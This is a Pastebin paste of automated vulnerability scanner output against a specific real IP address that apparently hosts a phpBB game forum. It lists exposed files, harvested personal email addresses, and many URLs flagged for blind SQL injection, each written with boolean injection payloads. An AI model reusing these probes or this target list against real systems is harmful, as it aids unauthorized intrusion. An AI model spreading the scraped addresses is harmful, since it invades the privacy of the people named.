API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 30th, 2017
674
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.21 KB | None | 0 0
raw download clone embed print report
  1. Scan date: 12-4-2017 22:3:38
  2. ===================================================================================================
  3. | Domain: http://208.94.243.114/
  4. | Server: Apache/2.4.6 (CentOS) PHP/5.4.16
  5. | IP: 208.94.243.114
  6. ===================================================================================================
  7. |
  8. | Directory check:
  9. | [+] CODE: 200 URL: http://208.94.243.114/adm/
  10. | [+] CODE: 200 URL: http://208.94.243.114/icons/
  11. ===================================================================================================
  12. |
  13. | File check:
  14. | [+] CODE: 200 URL: http://208.94.243.114/config.php
  15. | [+] CODE: 200 URL: http://208.94.243.114/faq.php
  16. | [+] CODE: 200 URL: http://208.94.243.114/index.php
  17. | [+] CODE: 200 URL: http://208.94.243.114/search.php
  18. | [+] CODE: 200 URL: http://208.94.243.114/web.config
  19. ===================================================================================================
  20. |
  21. | Check robots.txt:
  22. |
  23. | Check sitemap.xml:
  24. ===================================================================================================
  25. |
  26. | Crawler Started:
  27. | Plugin name: Code Disclosure v.1.1 Loaded.
  28. | Plugin name: phpinfo() Disclosure v.1 Loaded.
  29. | Plugin name: Upload Form Detect v.1.1 Loaded.
  30. | Plugin name: External Host Detect v.1.2 Loaded.
  31. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  32. | Plugin name: FCKeditor upload test v.1 Loaded.
  33. | Plugin name: E-mail Detection v.1.1 Loaded.
  34. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
  35. | [+] Crawling finished, 616 URL's found!
  36. |
  37. | Source Code Disclosure:
  38. |
  39. | PHPinfo() Disclosure:
  40. |
  41. | File Upload Forms:
  42. |
  43. | External hosts:
  44. | [+] External Host Found: https://www.phpbb.com
  45. | [+] External Host Found: http://www.google.com
  46. | [+] External Host Found: https://i.gyazo.com
  47. | [+] External Host Found: http://httpd.apache.org
  48. | [+] External Host Found: https://youtu.be
  49. | [+] External Host Found: https://www.paypal.me
  50. | [+] External Host Found: http://mxsimulator.com
  51. | [+] External Host Found: https://docs.google.com
  52. | [+] External Host Found: http://forum.mxsimulator.com
  53. |
  54. | Timthumb:
  55. |
  56. | FCKeditor File Upload:
  57. |
  58. | E-mails:
  59. | [+] E-mail Found: mike@hyperreal.org
  60. | [+] E-mail Found: michael@racefactorygaming.com
  61. | [+] E-mail Found: kevinh@kevcom.com
  62. | [+] E-mail Found: claasicdesigns@gmail.com
  63. | [+] E-mail Found: jbmxer99@gmail.com
  64. | [+] E-mail Found: tjbmxer99@yahoo.com
  65. | [+] E-mail Found: humbedooh@apache.org
  66. | [+] E-mail Found: jlv@mxsimulator.com
  67. | [+] E-mail Found: chris@racefactorygaming.com
  68. |
  69. | Web Backdoors:
  70. |
  71. | Ignored Files:
  72. | http://208.94.243.114/adm/assets/javascript/jquery.min.js?assets_version=3
  73. | http://208.94.243.114/adm/styles/prosilver/template/ajax.js?assets_version=3
  74. | http://208.94.243.114/adm/.styles/prosilver/template/forum_fn.js?assets_version=3
  75. | http://208.94.243.114/adm/.styles/prosilver/theme/stylesheet.css?assets_version=3
  76. | http://208.94.243.114/assets/javascript/jquery.min.js?assets_version=3
  77. | http://208.94.243.114/styles/nofrills/theme/stylesheet.css?assets_version=3
  78. | http://208.94.243.114/adm/styles/prosilver/theme/responsive.css?assets_version=3
  79. | http://208.94.243.114/styles/prosilver/theme/en/stylesheet.css?assets_version=3
  80. | http://208.94.243.114/styles/prosilver/theme/stylesheet.css?assets_version=3
  81. | http://208.94.243.114/adm/.styles/nofrills/theme/stylesheet.css?assets_version=3
  82. | http://208.94.243.114/styles/prosilver/template/forum_fn.js?assets_version=3
  83. | http://208.94.243.114/styles/nofrills/theme/tweaks.css?assets_version=3
  84. | http://208.94.243.114/styles/prosilver/template/ajax.js?assets_version=3
  85. | http://208.94.243.114/adm/styles/prosilver/theme/en/stylesheet.css?assets_version=3
  86. | http://208.94.243.114/styles/prosilver/theme/responsive.css?assets_version=3
  87. | http://208.94.243.114/assets/javascript/core.js?assets_version=3
  88. | http://208.94.243.114/adm/styles/nofrills/theme/stylesheet.css?assets_version=3
  89. | http://208.94.243.114/adm/styles/nofrills/theme/tweaks.css?assets_version=3
  90. | http://208.94.243.114/adm/.styles/prosilver/theme/responsive.css?assets_version=3
  91. | http://208.94.243.114/adm/.styles/nofrills/theme/tweaks.css?assets_version=3
  92. | http://208.94.243.114/adm/.assets/javascript/core.js?assets_version=3
  93. | http://208.94.243.114/adm/.styles/prosilver/theme/en/stylesheet.css?assets_version=3
  94. | http://208.94.243.114/adm/styles/prosilver/theme/stylesheet.css?assets_version=3
  95. | http://208.94.243.114/adm/assets/javascript/core.js?assets_version=3
  96. | http://208.94.243.114/adm/.styles/prosilver/template/ajax.js?assets_version=3
  97. | http://208.94.243.114/adm/.assets/javascript/jquery.min.js?assets_version=3
  98. | http://208.94.243.114/adm/styles/prosilver/template/forum_fn.js?assets_version=3
  99. ===================================================================================================
  100. | Dynamic tests:
  101. | Plugin name: Learning New Directories v.1.2 Loaded.
  102. | Plugin name: FCKedior tests v.1.1 Loaded.
  103. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  104. | Plugin name: Find Backup Files v.1.2 Loaded.
  105. | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
  106. | Plugin name: Local File Include tests v.1.1 Loaded.
  107. | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
  108. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  109. | Plugin name: Remote File Include tests v.1.2 Loaded.
  110. | Plugin name: SQL-injection tests v.1.2 Loaded.
  111. | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
  112. | Plugin name: Web Shell Finder v.1.3 Loaded.
  113. | [+] 2 New directories added
  114. |
  115. |
  116. | FCKeditor tests:
  117. |
  118. |
  119. | Timthumb < 1.33 vulnerability:
  120. |
  121. |
  122. | Backup Files:
  123. |
  124. |
  125. | Blind SQL Injection:
  126. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=bbd0d2a0a0957a0bbf54d532db9fa735&f=2'+AND+'1'='1
  127. | [+] Keyword: registered
  128. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=bbd0d2a0a0957a0bbf54d532db9fa735&f=16'+AND+'1'='1
  129. | [+] Keyword: registered
  130. | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?sid=1f3f5ae3d172f75e376fd5c36af8582d&search_id=active_topics'+AND+'1'='1
  131. | [+] Keyword: matches
  132. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewforum.php?sid=8cc8c7ac1c34471c1810e7c9d2710511&f=18'+AND+'1'='1
  133. | [+] Keyword: registered
  134. | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?st=0&sd=d&sr=topics&sid=bbd0d2a0a0957a0bbf54d532db9fa735&search_id=unanswered&start=150&sk=t+AND+1=1
  135. | [+] Keyword: Stream
  136. | [+] Vul [Blind SQL-i]: http://208.94.243.114/search.php?st=0&sk=t&sr=topics&sid=bbd0d2a0a0957a0bbf54d532db9fa735&search_id=unanswered&start=100&sd=d+AND+1=1
  137. | [+] Keyword: looking
  138. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?t=44618&sid=bbd0d2a0a0957a0bbf54d532db9fa735&start=15&f=1'+AND+'1'='1
  139. | [+] Keyword: registered
  140. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?t=44791&sid=cd7d4db4c791c38fa9b4f38d01896aaa&f=2'+AND+'1'='1
  141. | [+] Keyword: registered
  142. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?f=15&sid=cd7d4db4c791c38fa9b4f38d01896aaa&t=44805'+AND+'1'='1
  143. | [+] Keyword: registered
  144. | [+] Vul [Blind SQL-i]: http://208.94.243.114/viewtopic.php?f=6&t=44781&sid=cd7d4db4c791c38fa9b4f38d01896aaa'+AND+'1'='1
  145. | [+] Keyword: registered
  146. | [+] Vul [Blind SQL-i]: http://208.94.243.114/index.php?sid=e2b85a78f29e9f444067f73b38c088d3'+AND+'1'='1
  147. | [+] Keyword: guests
  148. | [+] Vul [Blind SQL-i]: http://208.94.243.114/index.php?sid=447a43fcba19fbc64076a4c14cb3fe47+AND+1=1
  149. | [+] Keyword: guests
  150. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=1&t=44841&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  151. | [+] Keyword: topics
  152. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=7&t=44840&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  153. | [+] Keyword: topics
  154. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44837&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  155. | [+] Keyword: topics
  156. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=17&t=44839&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  157. | [+] Keyword: topics
  158. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44826&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  159. | [+] Keyword: topics
  160. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44825&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  161. | [+] Keyword: topics
  162. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44820&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  163. | [+] Keyword: topics
  164. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=15&t=44805&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  165. | [+] Keyword: topics
  166. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=2&t=44791&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  167. | [+] Keyword: topics
  168. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=7&t=44774&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  169. | [+] Keyword: topics
  170. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=44781&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  171. | [+] Keyword: topics
  172. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=18&t=44778&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  173. | [+] Keyword: topics
  174. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=25&t=44842&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  175. | [+] Keyword: topics
  176. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=6&t=40401&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  177. | [+] Keyword: topics
  178. | [+] Vul [Blind SQL-i]: http://208.94.243.114/posting.php?f=19&t=43462&sid=bbd0d2a0a0957a0bbf54d532db9fa735&mode=reply+AND+1=1
  179. | [+] Keyword: topics
  180. |
  181. |
  182. | Local File Include:
  183. |
  184. |
  185. | PHP CGI Argument Injection:
  186. |
  187. |
  188. | Remote Command Execution:
  189. |
  190. |
  191. | Remote File Include:
  192. |
  193. |
  194. | SQL Injection:
  195. |
  196. |
  197. | Cross-Site Scripting (XSS):
  198. |
  199. |
  200. | Web Shell Finder:
  201. ===================================================================================================
  202. | Static tests:
  203. | Plugin name: Local File Include tests v.1.1 Loaded.
  204. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  205. | Plugin name: Remote File Include tests v.1.1 Loaded.
  206. |
  207. |
  208. | Local File Include:
  209. |
  210. |
  211. | Remote Command Execution:
  212. |
  213. |
  214. | Remote File Include:
  215. ===================================================================================================
  216. Scan end date: 13-4-2017 1:39:31
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!